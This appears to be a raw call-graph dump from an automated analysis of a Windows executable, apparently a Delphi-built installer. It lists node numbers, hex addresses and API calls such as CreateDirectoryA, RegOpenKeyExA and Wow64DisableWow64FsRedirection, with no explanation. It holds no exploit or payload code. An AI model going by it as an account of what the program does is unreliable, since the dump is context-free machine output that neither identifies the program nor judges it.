API calls 5124->5126 5125 4034f0 4 API calls 5125->5127 5128 408bfe 5126->5128 5127->5120 5127->5121 5127->5125 5131 403420 4 API calls 5127->5131 5132 4031e8 4 API calls 5127->5132 5144 404c10 5128->5144 5129 403420 4 API calls 5129->5133 5130 4031e8 4 API calls 5130->5133 5131->5127 5132->5127 5133->5119 5133->5127 5133->5129 5133->5130 5424 4034f0 5133->5424 5459 4078c4 5134->5459 5138 409ac1 5137->5138 5139 409aa9 5137->5139 5141 405880 4 API calls 5138->5141 5140 405880 4 API calls 5139->5140 5142 409abb 5140->5142 5143 409ad2 5141->5143 5142->5005 5143->5005 5145 402594 4 API calls 5144->5145 5146 404c1b 5145->5146 5146->5016 5147->5021 5149 403164 5148->5149 5150 40318c TlsGetValue 5148->5150 5149->5024 5151 403196 5150->5151 5152 40316f 5150->5152 5151->5024 5156 40310c 5152->5156 5154 403174 TlsGetValue 5155 403184 5154->5155 5155->5024 5157 403120 LocalAlloc 5156->5157 5158 403116 5156->5158 5159 40313e TlsSetValue 5157->5159 5160 403132 5157->5160 5158->5157 5159->5160 5160->5154 5233 405930 5161->5233 5164 405270 GetSystemDefaultLCID 5166 4052a6 5164->5166 5165 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5165->5166 5166->5165 5167 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5166->5167 5168 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5166->5168 5171 405308 5166->5171 5167->5166 5168->5166 5169 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5169->5171 5170 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5170->5171 5171->5169 5171->5170 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5172 5173 40538b 5171->5173 5172->5171 5266 4031b8 5173->5266 5176 4053b4 GetSystemDefaultLCID 5270 4051fc GetLocaleInfoA 5176->5270 5179 4031e8 4 API calls 5180 4053f4 5179->5180 5181 4051fc 5 API calls 5180->5181 5182 405409 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 40542d 5183->5184 5276 405248 GetLocaleInfoA 5184->5276 5187 405248 GetLocaleInfoA 5188 40545d 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405477 5189->5190 5191 405248 GetLocaleInfoA 5190->5191 5192 405494 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 4054ae 5193->5194 5195 4031e8 4 API calls 5194->5195 5196 4054bb 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054d0 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054dd 5199->5200 5201 405248 GetLocaleInfoA 5200->5201 5202 4054eb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 405505 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 405512 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405527 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405534 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405549 5211->5212 5213 405566 5212->5213 5214 405557 5212->5214 5215 40322c 4 API calls 5213->5215 5284 40322c 5214->5284 5217 405564 5215->5217 5218 4051fc 5 API calls 5217->5218 5219 405588 5218->5219 5220 4055a5 5219->5220 5221 405596 5219->5221 5223 403198 4 API calls 5220->5223 5222 40322c 4 API calls 5221->5222 5224 4055a3 5222->5224 5223->5224 5278 4033b4 5224->5278 5226 4055c7 5227 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5226->5227 5228 4055e1 5227->5228 5229 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055fb 5229->5230 5231 405ce4 GetVersionExA 5230->5231 5232 405cfb 5231->5232 5232->5041 5234 40593c 5233->5234 5241 404ccc LoadStringA 5234->5241 5237 4031e8 4 API calls 5238 40596d 5237->5238 5244 403198 5238->5244 5248 403278 5241->5248 5245 4031b7 5244->5245 5246 40319e 5244->5246 5245->5164 5246->5245 5262 4025ac 5246->5262 5253 403254 5248->5253 5250 403288 5251 403198 4 API calls 5250->5251 5252 4032a0 5251->5252 5252->5237 5254 403274 5253->5254 5255 403258 5253->5255 5254->5250 5258 402594 5255->5258 5257 403261 5257->5250 5259 402598 5258->5259 5260 4025a2 5258->5260 5259->5260 5261 403154 4 API calls 5259->5261 5260->5257 5260->5260 5261->5260 5263 4025b0 5262->5263 5265 4025ba 5262->5265 5264 403154 4 API calls 5263->5264 5263->5265 5264->5265 5265->5245 5268 4031be 5266->5268 5267 4031e3 5267->5176 5268->5267 5269 4025ac 4 API calls 5268->5269 5269->5268 5271 405223 5270->5271 5272 405235 5270->5272 5273 403278 4 API calls 5271->5273 5274 40322c 4 API calls 5272->5274 5275 405233 5273->5275 5274->5275 5275->5179 5277 405264 5276->5277 5277->5187 5279 4033bc 5278->5279 5280 403254 4 API calls 5279->5280 5281 4033cf 5280->5281 5282 4031e8 4 API calls 5281->5282 5283 4033f7 5282->5283 5286 403230 5284->5286 5285 403252 5285->5217 5286->5285 5287 4025ac 4 API calls 5286->5287 5287->5285 5296 403414 5288->5296 5291 406fee 5292 407284 FormatMessageA 5291->5292 5293 4072aa 5292->5293 5294 403278 4 API calls 5293->5294 5295 4072c7 5294->5295 5295->5048 5297 403418 LoadLibraryA 5296->5297 5297->5291 5305 406af0 5298->5305 5300 406bf3 5301 406c05 5300->5301 5302 406af0 4 API calls 5300->5302 5303 403198 4 API calls 5301->5303 5302->5300 5304 406c1a 5303->5304 5304->5062 5306 406b1c 5305->5306 5307 403278 4 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 4 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5300 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 4 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 407578 5319->5320 5321 4075b7 CreateFileA 5320->5321 5321->5086 5323 403414 5322->5323 5324 4075b7 CreateFileA 5323->5324 5324->5086 5328 4073ec 5325->5328 5329 407284 5 API calls 5328->5329 5330 407414 5329->5330 5331 407434 5330->5331 5337 405184 5330->5337 5340 405880 5331->5340 5334 407443 5335 403198 4 API calls 5334->5335 5336 407460 5335->5336 5336->5087 5344 405198 5337->5344 5341 405887 5340->5341 5342 4031e8 4 API calls 5341->5342 5343 40589f 5342->5343 5343->5334 5345 4051b5 5344->5345 5352 404e48 5345->5352 5348 4051e1 5350 403278 4 API calls 5348->5350 5351 405193 5350->5351 5351->5331 5355 404e63 5352->5355 5353 404e75 5353->5348 5357 404bd4 5353->5357 5355->5353 5360 404f6a 5355->5360 5367 404e3c 5355->5367 5358 405930 5 API calls 5357->5358 5359 404be5 5358->5359 5359->5348 5361 404f7b 5360->5361 5364 404fc9 5360->5364 5363 40504f 5361->5363 5361->5364 5366 404fe7 5363->5366 5374 404e28 5363->5374 5364->5366 5370 404de4 5364->5370 5366->5355 5368 403198 4 API calls 5367->5368 5369 404e46 5368->5369 5369->5355 5371 404df2 5370->5371 5377 404bec 5371->5377 5373 404e20 5373->5364 5390 4039a4 5374->5390 5380 4059a0 5377->5380 5379 404c05 5379->5373 5381 4059ae 5380->5381 5382 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5381->5382 5383 4059d8 5382->5383 5384 405184 19 API calls 5383->5384 5385 4059e6 5384->5385 5386 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5385->5386 5387 4059f1 5386->5387 5388 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 405a0b 5388->5389 5389->5379 5391 4039ab 5390->5391 5396 4038b4 5391->5396 5393 4039cb 5394 403198 4 API calls 5393->5394 5395 4039d2 5394->5395 5395->5366 5397 4038d5 5396->5397 5398 4038c8 5396->5398 5400 403934 5397->5400 5401 4038db 5397->5401 5399 403780 6 API calls 5398->5399 5404 4038d0 5399->5404 5402 403993 5400->5402 5403 40393b 5400->5403 5405 4038e1 5401->5405 5406 4038ee 5401->5406 5407 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5402->5407 5408 403941 5403->5408 5409 40394b 5403->5409 5404->5393 5410 403894 6 API calls 5405->5410 5411 403894 6 API calls 5406->5411 5407->5404 5412 403864 9 API calls 5408->5412 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5413 5410->5404 5414 4038fc 5411->5414 5412->5404 5415 40395d 5413->5415 5416 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5414->5416 5418 403864 9 API calls 5415->5418 5417 403917 5416->5417 5420 40374c VariantClear 5417->5420 5419 403976 5418->5419 5422 40374c VariantClear 5419->5422 5421 40392c 5420->5421 5421->5393 5423 40398b 5422->5423 5423->5393 5425 4034fd 5424->5425 5431 40352d 5424->5431 5427 403526 5425->5427 5429 403509 5425->5429 5426 403198 4 API calls 5432 403517 5426->5432 5428 403254 4 API calls 5427->5428 5428->5431 5439 4025c4 5429->5439 5431->5426 5432->5133 5434 407cd3 5433->5434 5438 407cc8 5433->5438 5443 407c5c 5434->5443 5437 405880 4 API calls 5437->5438 5438->5124 5440 4025ca 5439->5440 5441 4025dc 5440->5441 5442 403154 4 API calls 5440->5442 5441->5432 5441->5441 5442->5441 5444 407c70 5443->5444 5445 407caf 5443->5445 5444->5445 5447 407bac 5444->5447 5445->5437 5445->5438 5448 407bb7 5447->5448 5451 407bc8 5447->5451 5449 405880 4 API calls 5448->5449 5449->5451 5450 4074a0 20 API calls 5452 407bdc 5450->5452 5451->5450 5453 4074a0 20 API calls 5452->5453 5454 407bfd 5453->5454 5455 407918 InterlockedExchange 5454->5455 5456 407c12 5455->5456 5457 407c28 5456->5457 5458 405880 4 API calls 5456->5458 5457->5444 5458->5457 5460 4078d6 5459->5460 5461 4078e7 5459->5461 5462 4078db InterlockedExchange 5460->5462 5461->5007 5462->5461 6235 409e47 6236 409e6c 6235->6236 6237 4098f4 15 API calls 6236->6237 6241 409e71 6237->6241 6238 409ec4 6269 4026c4 GetSystemTime 6238->6269 6240 409ec9 6242 409330 32 API calls 6240->6242 6241->6238 6244 408dd8 4 API calls 6241->6244 6243 409ed1 6242->6243 6246 4031e8 4 API calls 6243->6246 6245 409ea0 6244->6245 6248 409ea8 MessageBoxA 6245->6248 6247 409ede 6246->6247 6249 406928 5 API calls 6247->6249 6248->6238 6250 409eb5 6248->6250 6251 409eeb 6249->6251 6252 405854 5 API calls 6250->6252 6253 4066c0 5 API calls 6251->6253 6252->6238 6254 409efb 6253->6254 6255 406638 5 API calls 6254->6255 6256 409f0c 6255->6256 6257 403340 4 API calls 6256->6257 6258 409f1a 6257->6258 6259 4031e8 4 API calls 6258->6259 6260 409f2a 6259->6260 6261 4074e0 23 API calls 6260->6261 6262 409f69 6261->6262 6263 402594 4 API calls 6262->6263 6264 409f89 6263->6264 6265 407a28 5 API calls 6264->6265 6266 409fcb 6265->6266 6267 407cb8 21 API calls 6266->6267 6268 409ff2 6267->6268 6269->6240 6196 407548 6197 407554 CloseHandle 6196->6197 6198 40755d 6196->6198 6197->6198 6648 402b48 RaiseException 6199 407749 6200 4076dc WriteFile 6199->6200 6209 407724 6199->6209 6201 4076e8 6200->6201 6202 4076ef 6200->6202 6203 40748c 21 API calls 6201->6203 6204 407700 6202->6204 6205 4073ec 20 API calls 6202->6205 6203->6202 6205->6204 6206 4077e0 6207 4078db InterlockedExchange 6206->6207 6208 407890 6206->6208 6210 4078e7 6207->6210 6209->6199 6209->6206 6649 40294a 6650 402952 6649->6650 6651 402967 6650->6651 6652 403554 4 API calls 6650->6652 6652->6650 6653 403f4a 6654 403f53 6653->6654 6655 403f5c 6653->6655 6657 403f07 6654->6657 6660 403f09 6657->6660 6659 403f3c 6659->6655 6662 403154 4 API calls 6660->6662 6664 403e9c 6660->6664 6667 403f3d 6660->6667 6680 403e9c 6660->6680 6661 403ecf 6661->6655 6662->6660 6663 403ef2 6665 402674 4 API calls 6663->6665 6664->6659 6664->6663 6669 403ea9 6664->6669 6671 403e8e 6664->6671 6665->6661 6667->6655 6669->6661 6670 402674 4 API calls 6669->6670 6670->6661 6672 403e4c 6671->6672 6673 403e67 6672->6673 6674 403e62 6672->6674 6675 403e7b 6672->6675 6678 403e78 6673->6678 6679 402674 4 API calls 6673->6679 6677 403cc8 4 API calls 6674->6677 6676 402674 4 API calls 6675->6676 6676->6678 6677->6673 6678->6663 6678->6669 6679->6678 6681 403ed7 6680->6681 6687 403ea9 6680->6687 6683 403ef2 6681->6683 6685 403e8e 4 API calls 6681->6685 6682 403ecf 6682->6660 6684 402674 4 API calls 6683->6684 6684->6682 6686 403ee6 6685->6686 6686->6683 6686->6687 6687->6682 6688 402674 4 API calls 6687->6688 6688->6682 6697 405150 6698 405163 6697->6698 6699 404e48 19 API calls 6698->6699 6700 405177 6699->6700 6270 403a52 6271 403a74 6270->6271 6272 403a5a WriteFile 6270->6272 6272->6271 6273 403a78 GetLastError 6272->6273 6273->6271 6274 402654 6275 403154 4 API calls 6274->6275 6276 402614 6275->6276 6277 402632 6276->6277 6278 403154 4 API calls 6276->6278 6277->6277 6278->6277 5645 409e62 5646 409aa0 4 API calls 5645->5646 5647 409e67 5646->5647 5648 409e6c 5647->5648 5748 402f24 5647->5748 5682 4098f4 5648->5682 5651 409ec4 5687 4026c4 GetSystemTime 5651->5687 5653 409e71 5653->5651 5753 408dd8 5653->5753 5654 409ec9 5688 409330 5654->5688 5658 409ea0 5661 409ea8 MessageBoxA 5658->5661 5659 4031e8 4 API calls 5660 409ede 5659->5660 5706 406928 5660->5706 5661->5651 5663 409eb5 5661->5663 5756 405854 5663->5756 5669 409f0c 5733 403340 5669->5733 5671 409f1a 5672 4031e8 4 API calls 5671->5672 5673 409f2a 5672->5673 5674 4074e0 23 API calls 5673->5674 5675 409f69 5674->5675 5676 402594 4 API calls 5675->5676 5677 409f89 5676->5677 5678 407a28 5 API calls 5677->5678 5679 409fcb 5678->5679 5680 407cb8 21 API calls 5679->5680 5681 409ff2 5680->5681 5760 40953c 5682->5760 5687->5654 5697 409350 5688->5697 5691 409375 CreateDirectoryA 5692 4093ed 5691->5692 5693 40937f GetLastError 5691->5693 5694 40322c 4 API calls 5692->5694 5693->5697 5695 4093f7 5694->5695 5698 4031b8 4 API calls 5695->5698 5696 408dd8 4 API calls 5696->5697 5697->5691 5697->5696 5702 407284 5 API calls 5697->5702 5705 405880 4 API calls 5697->5705 5852 406cf4 5697->5852 5875 409224 5697->5875 5894 404c84 5697->5894 5897 408da8 5697->5897 5700 409411 5698->5700 5701 4031b8 4 API calls 5700->5701 5703 40941e 5701->5703 5702->5697 5703->5659 5705->5697 6007 406820 5706->6007 5709 403454 4 API calls 5710 40694a 5709->5710 5711 4066c0 5710->5711 6012 4068e4 5711->6012 5714 4066f0 5717 403340 4 API calls 5714->5717 5715 4066fe 5716 403454 4 API calls 5715->5716 5718 406711 5716->5718 5719 4066fc 5717->5719 5720 403340 4 API calls 5718->5720 5721 403198 4 API calls 5719->5721 5720->5719 5722 406733 5721->5722 5723 406638 5722->5723 5724 406642 5723->5724 5725 406665 5723->5725 6018 406950 5724->6018 5727 40322c 4 API calls 5725->5727 5729 40666e 5727->5729 5728 406649 5728->5725 5730 406654 5728->5730 5729->5669 5731 403340 4 API calls 5730->5731 5732 406662 5731->5732 5732->5669 5734 403344 5733->5734 5735 4033a5 5733->5735 5736 4031e8 5734->5736 5737 40334c 5734->5737 5739 4031fc 5736->5739 5741 403254 4 API calls 5736->5741 5737->5735 5738 40335b 5737->5738 5742 4031e8 4 API calls 5737->5742 5743 403254 4 API calls 5738->5743 5740 403228 5739->5740 5744 4025ac 4 API calls 5739->5744 5740->5671 5741->5739 5742->5738 5745 403375 5743->5745 5744->5740 5746 4031e8 4 API calls 5745->5746 5747 4033a1 5746->5747 5747->5671 5749 403154 4 API calls 5748->5749 5750 402f29 5749->5750 6024 402bcc 5750->6024 5752 402f51 5752->5752 5754 408da8 4 API calls 5753->5754 5755 408df4 5754->5755 5755->5658 5757 405859 5756->5757 5758 405930 5 API calls 5757->5758 5759 40586b 5758->5759 5759->5759 5767 40955b 5760->5767 5761 409590 5764 40959d GetUserDefaultLangID 5761->5764 5768 409592 5761->5768 5762 409594 5778 407024 GetModuleHandleA GetProcAddress 5762->5778 5764->5768 5766 40956f 5772 409884 5766->5772 5767->5761 5767->5762 5767->5766 5768->5766 5769 4095cb GetACP 5768->5769 5770 4095ef 5768->5770 5769->5766 5769->5768 5770->5766 5771 409615 GetACP 5770->5771 5771->5766 5771->5770 5773 40988c 5772->5773 5777 4098c6 5772->5777 5774 403420 4 API calls 5773->5774 5773->5777 5775 4098c0 5774->5775 5836 408e80 5775->5836 5777->5653 5779 407067 5778->5779 5780 40705e 5778->5780 5781 407070 5779->5781 5782 4070a8 5779->5782 5791 403198 4 API calls 5780->5791 5799 406f68 5781->5799 5784 406f68 RegOpenKeyExA 5782->5784 5786 4070c1 5784->5786 5785 407089 5787 4070de 5785->5787 5802 406f5c 5785->5802 5786->5787 5788 406f5c 6 API calls 5786->5788 5789 40322c 4 API calls 5787->5789 5792 4070d5 RegCloseKey 5788->5792 5793 4070eb 5789->5793 5795 407120 5791->5795 5792->5787 5805 4032fc 5793->5805 5797 403198 4 API calls 5795->5797 5798 407128 5797->5798 5798->5768 5800 406f73 5799->5800 5801 406f79 RegOpenKeyExA 5799->5801 5800->5801 5801->5785 5819 406e10 5802->5819 5806 403300 5805->5806 5807 40333f 5805->5807 5808 4031e8 5806->5808 5809 40330a 5806->5809 5807->5780 5815 4031fc 5808->5815 5816 403254 4 API calls 5808->5816 5810 403334 5809->5810 5811 40331d 5809->5811 5814 4034f0 4 API calls 5810->5814 5812 4034f0 4 API calls 5811->5812 5817 403322 5812->5817 5813 403228 5813->5780 5814->5817 5815->5813 5818 4025ac 4 API calls 5815->5818 5816->5815 5817->5780 5818->5813 5820 406e36 RegQueryValueExA 5819->5820 5821 406e59 5820->5821 5826 406e7b 5820->5826 5822 406e73 5821->5822 5821->5826 5827 403278 4 API calls 5821->5827 5828 403420 4 API calls 5821->5828 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5787 5826->5823 5827->5821 5829 406eb0 RegQueryValueExA 5828->5829 5829->5820 5830 406ecc 5829->5830 5830->5826 5831 4034f0 4 API calls 5830->5831 5832 406f0e 5831->5832 5833 406f20 5832->5833 5835 403420 4 API calls 5832->5835 5834 4031e8 4 API calls 5833->5834 5834->5826 5835->5833 5837 408e8e 5836->5837 5839 408ea6 5837->5839 5849 408e18 5837->5849 5840 408e18 4 API calls 5839->5840 5841 408eca 5839->5841 5840->5841 5842 407918 InterlockedExchange 5841->5842 5843 408ee5 5842->5843 5844 408e18 4 API calls 5843->5844 5846 408ef8 5843->5846 5844->5846 5845 408e18 4 API calls 5845->5846 5846->5845 5847 403278 4 API calls 5846->5847 5848 408f27 5846->5848 5847->5846 5848->5777 5850 405880 4 API calls 5849->5850 5851 408e29 5850->5851 5851->5839 5901 406a58 5852->5901 5855 406d26 5857 406a58 5 API calls 5855->5857 5859 406d72 5855->5859 5858 406d36 5857->5858 5860 406d42 5858->5860 5862 406a34 7 API calls 5858->5862 5909 406888 5859->5909 5860->5859 5865 406a58 5 API calls 5860->5865 5871 406d67 5860->5871 5862->5860 5867 406d5b 5865->5867 5866 406638 5 API calls 5868 406d87 5866->5868 5869 406a34 7 API calls 5867->5869 5867->5871 5870 40322c 4 API calls 5868->5870 5869->5871 5872 406d91 5870->5872 5871->5859 5921 406cc8 GetWindowsDirectoryA 5871->5921 5873 4031b8 4 API calls 5872->5873 5874 406dab 5873->5874 5874->5697 5876 409244 5875->5876 5877 406638 5 API calls 5876->5877 5878 40925d 5877->5878 5879 40322c 4 API calls 5878->5879 5884 409268 5879->5884 5881 406978 6 API calls 5881->5884 5882 4033b4 4 API calls 5882->5884 5883 408dd8 4 API calls 5883->5884 5884->5881 5884->5882 5884->5883 5885 405880 4 API calls 5884->5885 5887 4092e4 5884->5887 5961 4091b0 5884->5961 5969 409034 5884->5969 5885->5884 5888 40322c 4 API calls 5887->5888 5889 4092ef 5888->5889 5890 4031b8 4 API calls 5889->5890 5891 409309 5890->5891 5892 403198 4 API calls 5891->5892 5893 409311 5892->5893 5893->5697 5895 405198 19 API calls 5894->5895 5896 404ca2 5895->5896 5896->5697 5898 408dc8 5897->5898 5997 408c80 5898->5997 5902 4034f0 4 API calls 5901->5902 5903 406a6b 5902->5903 5904 406a82 GetEnvironmentVariableA 5903->5904 5908 406a95 5903->5908 5923 406dec 5903->5923 5904->5903 5905 406a8e 5904->5905 5906 403198 4 API calls 5905->5906 5906->5908 5908->5855 5918 406a34 5908->5918 5910 403414 5909->5910 5911 4068ab GetFullPathNameA 5910->5911 5912 4068b7 5911->5912 5913 4068ce 5911->5913 5912->5913 5914 4068bf 5912->5914 5915 40322c 4 API calls 5913->5915 5916 403278 4 API calls 5914->5916 5917 4068cc 5915->5917 5916->5917 5917->5866 5927 4069dc 5918->5927 5922 406ce9 5921->5922 5922->5859 5924 406dfa 5923->5924 5925 4034f0 4 API calls 5924->5925 5926 406e08 5925->5926 5926->5903 5934 406978 5927->5934 5929 4069fe 5930 406a06 GetFileAttributesA 5929->5930 5931 406a1b 5930->5931 5932 403198 4 API calls 5931->5932 5933 406a23 5932->5933 5933->5855 5944 406744 5934->5944 5936 4069b0 5939 4069c6 5936->5939 5940 4069bb 5936->5940 5938 406989 5938->5936 5951 406970 CharPrevA 5938->5951 5952 403454 5939->5952 5941 40322c 4 API calls 5940->5941 5943 4069c4 5941->5943 5943->5929 5947 406755 5944->5947 5945 4067b9 5946 406680 IsDBCSLeadByte 5945->5946 5948 4067b4 5945->5948 5946->5948 5947->5945 5949 406773 5947->5949 5948->5938 5949->5948 5959 406680 IsDBCSLeadByte 5949->5959 5951->5938 5953 403486 5952->5953 5954 403459 5952->5954 5955 403198 4 API calls 5953->5955 5954->5953 5957 40346d 5954->5957 5956 40347c 5955->5956 5956->5943 5958 403278 4 API calls 5957->5958 5958->5956 5960 406694 5959->5960 5960->5949 5962 403198 4 API calls 5961->5962 5965 4091d1 5962->5965 5966 4091fe 5965->5966 5978 4032a8 5965->5978 5981 403494 5965->5981 5967 403198 4 API calls 5966->5967 5968 409213 5967->5968 5968->5884 5985 408f70 5969->5985 5971 40904a 5972 40904e 5971->5972 5991 406a48 5971->5991 5972->5884 5975 409081 5994 408fac 5975->5994 5979 403278 4 API calls 5978->5979 5980 4032b5 5979->5980 5980->5965 5982 403498 5981->5982 5984 4034c3 5981->5984 5983 4034f0 4 API calls 5982->5983 5983->5984 5984->5965 5986 408f7a 5985->5986 5987 408f7e 5985->5987 5986->5971 5988 408fa0 SetLastError 5987->5988 5989 408f87 Wow64DisableWow64FsRedirection 5987->5989 5990 408f9b 5988->5990 5989->5990 5990->5971 5992 4069dc 7 API calls 5991->5992 5993 406a52 GetLastError 5992->5993 5993->5975 5995 408fb1 Wow64RevertWow64FsRedirection 5994->5995 5996 408fbb 5994->5996 5995->5996 5996->5884 5998 403198 4 API calls 5997->5998 6004 408cb1 5997->6004 5998->6004 5999 408cdc 6000 4031b8 4 API calls 5999->6000 6002 408d69 6000->6002 6001 408cc8 6005 4032fc 4 API calls 6001->6005 6002->5697 6003 403278 4 API calls 6003->6004 6004->5999 6004->6001 6004->6003 6006 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6006 6005->5999 6006->6004 6008 406744 IsDBCSLeadByte 6007->6008 6010 406835 6008->6010 6009 40687f 6009->5709 6010->6009 6011 406680 IsDBCSLeadByte 6010->6011 6011->6010 6013 4068f3 6012->6013 6014 406820 IsDBCSLeadByte 6013->6014 6016 4068fe 6014->6016 6015 4066ea 6015->5714 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 406957 6018->6019 6020 40695b 6018->6020 6019->5728 6023 406970 CharPrevA 6020->6023 6022 40696c 6022->5728 6023->6022 6025 402bd5 RaiseException 6024->6025 6026 402be6 6024->6026 6025->6026 6026->5752 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6713 403f7d 6714 403fa2 6713->6714 6717 403f84 6713->6717 6716 403e8e 4 API calls 6714->6716 6714->6717 6715 403f8c 6716->6717 6717->6715 6718 402674 4 API calls 6717->6718 6719 403fca 6718->6719 6726 403d02 6733 403d12 6726->6733 6727 403ddf ExitProcess 6728 403db8 6730 403cc8 4 API calls 6728->6730 6729 403dea 6731 403dc2 6730->6731 6732 403cc8 4 API calls 6731->6732 6734 403dcc 6732->6734 6733->6727 6733->6728 6733->6729 6733->6733 6736 403da4 6733->6736 6737 403d8f MessageBoxA 6733->6737 6746 4019dc 6734->6746 6742 403fe4 6736->6742 6737->6728 6739 403dd1 6739->6727 6739->6729 6743 403fe8 6742->6743 6744 403f07 4 API calls 6743->6744 6745 404006 6744->6745 6747 401abb 6746->6747 6748 4019ed 6746->6748 6747->6739 6749 401a04 RtlEnterCriticalSection 6748->6749 6750 401a0e LocalFree 6748->6750 6749->6750 6751 401a41 6750->6751 6752 401a2f VirtualFree 6751->6752 6753 401a49 6751->6753 6752->6751 6754 401a70 LocalFree 6753->6754 6755 401a87 6753->6755 6754->6754 6754->6755 6756 401aa9 RtlDeleteCriticalSection 6755->6756 6757 401a9f RtlLeaveCriticalSection 6755->6757 6756->6739 6757->6756 6310 404206 6311 40420a 6310->6311 6312 4041cc 6310->6312 6313 404282 6311->6313 6314 403154 4 API calls 6311->6314 6315 404323 6314->6315 6316 402c08 6319 402c82 6316->6319 6320 402c19 6316->6320 6317 402c56 RtlUnwind 6318 403154 4 API calls 6317->6318 6318->6319 6320->6317 6320->6319 6323 402b28 6320->6323 6324 402b31 RaiseException 6323->6324 6325 402b47 6323->6325 6324->6325 6325->6317 6326 408c10 6327 408c17 6326->6327 6328 403198 4 API calls 6327->6328 6336 408cb1 6328->6336 6329 408cdc 6330 4031b8 4 API calls 6329->6330 6332 408d69 6330->6332 6331 408cc8 6334 4032fc 4 API calls 6331->6334 6333 403278 4 API calls 6333->6336 6334->6329 6335 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6335->6336 6336->6329 6336->6331 6336->6333 6336->6335 6337 40a011 6338 40a036 6337->6338 6339 407918 InterlockedExchange 6338->6339 6341 40a060 6339->6341 6340 40a070 6347 4076ac SetEndOfFile 6340->6347 6341->6340 6342 409aa0 4 API calls 6341->6342 6342->6340 6344 40a08c 6345 4025ac 4 API calls 6344->6345 6346 40a0c3 6345->6346 6348 4076c3 6347->6348 6349 4076bc 6347->6349 6348->6344 6350 40748c 21 API calls 6349->6350 6350->6348 6762 409916 6763 409918 6762->6763 6764 40993a 6763->6764 6765 409956 CallWindowProcA 6763->6765 6765->6764 6078 407017 6079 407008 SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 